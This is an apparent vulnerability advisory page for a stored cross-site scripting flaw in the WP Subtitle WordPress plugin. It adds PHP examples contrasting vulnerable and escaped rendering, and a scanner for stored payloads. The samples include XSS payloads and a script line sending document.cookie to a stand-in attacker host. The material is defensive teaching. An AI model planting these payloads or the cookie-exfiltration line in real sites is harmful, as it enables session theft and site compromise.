CVE-2025-57986
Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in husani WP Subtitle wp-subtitle allows Stored XSS. This issue affects WP Subtitle: from n/a through <= 3.4.1.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Stored XSS in WP Subtitle plugin (≤3.4.1) allows attackers with contributor+ privileges to inject malicious scripts via subtitle input.
Vulnerability
Overview
The WP Subtitle plugin for WordPress, versions 3.4.1 and earlier, contains a stored cross-site scripting (XSS) vulnerability caused by improper neutralization of user-supplied input during web page generation [1]. The flaw lies in the subtitle field: the value a user enters is neither sanitized when it is saved nor escaped when it is later rendered into the page, so any HTML or script it contains is emitted verbatim.
Exploitation
Details
An attacker with contributor-level privileges or higher can inject arbitrary JavaScript or HTML into the subtitle field [1]. When a user views a page that renders the malicious subtitle, the script executes in that user's browser under the site's origin. Because contributors cannot publish posts themselves, the typical first victim is the editor or administrator who reviews or previews the pending post; once the post is published, any visitor who loads the page is affected. This is stored XSS because the payload persists in the database and fires on every subsequent render, not just on the request that delivered it.
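The bug class described above, as an added example that is not WP Subtitle's code and is not derived from the vendor's fix: a hypothetical subtitle render routine that concatenates the stored value into markup, beside a hardened one that escapes for the output context. The function names, the sample payloads and the meta key `wps_subtitle` are assumptions; `esc_html()` and `esc_attr()` are real WordPress escaping functions, and the shims below only stand in for them when the script is run outside WordPress.

```php
<?php
// Added example, not the plugin's code. Shows stored XSS at render time and
// the output-escaping fix. Runs under plain `php` thanks to the shims below;
// inside WordPress the real esc_html()/esc_attr() are used instead.

if (!function_exists('esc_html')) {
    // Stand-in for WordPress esc_html(): escape a value placed in a text node.
    function esc_html(string $s): string {
        return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('esc_attr')) {
    // Stand-in for WordPress esc_attr(): escape a value placed in an attribute.
    function esc_attr(string $s): string {
        return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}

// Vulnerable pattern: the stored subtitle is concatenated straight into HTML,
// once inside an attribute and once as element text.
function render_subtitle_vulnerable(array $meta): string {
    $subtitle = $meta['wps_subtitle'] ?? ''; // meta key is an assumption
    return '<h2 class="wp-subtitle" title="' . $subtitle . '">'
         . $subtitle . '</h2>';
}

// Hardened pattern: same markup, but each occurrence is escaped for the
// context it lands in (attribute value vs. text node).
function render_subtitle_hardened(array $meta): string {
    $subtitle = $meta['wps_subtitle'] ?? '';
    return '<h2 class="wp-subtitle" title="' . esc_attr($subtitle) . '">'
         . esc_html($subtitle) . '</h2>';
}

// Crude check on rendered output: did a tag with an event handler, or an
// attribute breakout followed by an event handler, survive into the HTML?
function payload_is_live(string $html): bool {
    return (bool) preg_match('/<(?!h2\b|\/h2\b)[a-z]+\b[^>]*\bon[a-z]+\s*=/i', $html)
        || (bool) preg_match('/title="[^"]*"\s+on[a-z]+\s*=/i', $html);
}

// Constructed sample payloads (not real data): one injects a new element,
// the other breaks out of the title="" attribute.
$samples = [
    'element'   => ['wps_subtitle' => '<img src=x onerror="alert(document.domain)">'],
    'attribute' => ['wps_subtitle' => '" onmouseover="alert(document.domain)'],
];

foreach ($samples as $name => $meta) {
    $bad  = render_subtitle_vulnerable($meta);
    $good = render_subtitle_hardened($meta);
    printf("%-9s vulnerable: %s\n           live=%s\n", $name, $bad,
           payload_is_live($bad) ? 'yes' : 'no');
    printf("%-9s hardened:   %s\n           live=%s\n\n", $name, $good,
           payload_is_live($good) ? 'yes' : 'no');
}
```

Run with `php render-subtitle.php`: the vulnerable output carries a live `onerror` or `onmouseover` handler for both payloads, while the hardened output turns `<`, `>` and `"` into entities so the browser renders the payload as literal text. The point to take from the attribute case is that escaping must match the context; a value that is safe as a text node can still break out of an attribute if the wrong escaper is used.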
Impact
Successful exploitation enables an attacker to redirect visitors to malicious sites, inject advertisements, or steal session cookies [1]. Where the victim is an editor or administrator, script running in that browser can also drive authenticated actions through the victim's session. The CVSS v3 base score is 6.5 (Medium), reflecting that exploitation requires an authenticated account but can substantially affect site integrity and user trust.
Mitigation
The vendor has released version 3.4.2, which resolves the vulnerability [1]. Users are strongly advised to update immediately. For sites that cannot update, a web application firewall rule that filters the subtitle input may reduce risk, but such rules are routinely bypassed by encoding tricks, and updating is the only complete fix. Updating also does not remove payloads already stored in subtitles, so existing subtitles should be audited for injected markup afterwards. The durable fix for this bug class is to escape the subtitle for its output context at render time (esc_html() in a text node, esc_attr() inside an attribute) and to sanitize it on save for users who lack the unfiltered_html capability.
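A triage scan for payloads that may already be stored, as an added example that is not part of WP Subtitle or its fix. It assumes the subtitle lives in wp_postmeta under the meta key `wps_subtitle` (an assumption about the plugin's storage); the rows below are constructed inline so the script runs stand-alone under `php`, and the comment shows how the same rows would be fetched through `$wpdb` inside WordPress.

```php
<?php
// Added example, not the plugin's code: flag stored subtitles that contain
// markup a plain-text subtitle should never carry. Deliberately broad, meant
// for a human to review; it is a post-incident triage list, not a WAF rule.

const SUBTITLE_META_KEY = 'wps_subtitle'; // assumption, see lead-in

// Patterns worth a look. Event handlers are only matched inside a tag so that
// ordinary prose such as "season = summer" does not trip the scan.
const SUSPICIOUS_PATTERNS = [
    'script tag'        => '/<\s*script\b/i',
    'embedding tag'     => '/<\s*(iframe|object|embed|svg|math|img|video|audio)\b/i',
    'event handler'     => '/<[^>]*\son[a-z]+\s*=/i',
    'javascript: URL'   => '/javascript\s*:/i',
    'data: URL'         => '/data\s*:\s*text\/html/i',
];

// Returns one entry per suspicious row: post_id, the pattern that matched,
// and the raw stored value for manual review.
function find_suspicious_subtitles(array $rows): array {
    $hits = [];
    foreach ($rows as $row) {
        if (($row['meta_key'] ?? '') !== SUBTITLE_META_KEY) {
            continue; // unrelated meta, leave it alone
        }
        foreach (SUSPICIOUS_PATTERNS as $label => $re) {
            if (preg_match($re, (string) $row['meta_value'])) {
                $hits[] = [
                    'post_id' => (int) $row['post_id'],
                    'reason'  => $label,
                    'value'   => $row['meta_value'],
                ];
                break; // one reason per row is enough for triage
            }
        }
    }
    return $hits;
}

// Inside WordPress (e.g. via `wp eval-file`), the rows would come from:
//   $rows = $wpdb->get_results($wpdb->prepare(
//       "SELECT post_id, meta_key, meta_value FROM {$wpdb->postmeta} WHERE meta_key = %s",
//       SUBTITLE_META_KEY), ARRAY_A);
// Here they are constructed sample rows (not real data).
$rows = [
    ['post_id' => 11, 'meta_key' => 'wps_subtitle',  'meta_value' => 'A perfectly ordinary subtitle'],
    ['post_id' => 12, 'meta_key' => 'wps_subtitle',  'meta_value' => 'Q&A: is 3 < 5 when season = summer?'],
    ['post_id' => 13, 'meta_key' => 'wps_subtitle',  'meta_value' => 'Hi<script>fetch("https://attacker.invalid/?c="+document.cookie)</script>'],
    ['post_id' => 14, 'meta_key' => 'wps_subtitle',  'meta_value' => '<img src=x onerror=alert(1)>'],
    ['post_id' => 15, 'meta_key' => 'wps_subtitle',  'meta_value' => '<a href="javascript:alert(1)">read more</a>'],
    ['post_id' => 16, 'meta_key' => '_thumbnail_id', 'meta_value' => '<script>'], // wrong key, ignored
];

foreach (find_suspicious_subtitles($rows) as $hit) {
    printf("post %d: %s\n    %s\n", $hit['post_id'], $hit['reason'], $hit['value']);
}
```

On the constructed rows, posts 13, 14 and 15 are reported and posts 11, 12 and 16 are not; the benign `<` and `&` in post 12 show why the scan keys on tags and handlers rather than on any angle bracket. Every hit still needs a human decision (restore the field from a known-good revision, or clear it) and a look at the post's author and revision history to establish who stored it.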
AI Insight generated on May 19, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
WP Subtitle (wp-subtitle): <= 3.4.1
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
News mentions
No linked articles in our index yet.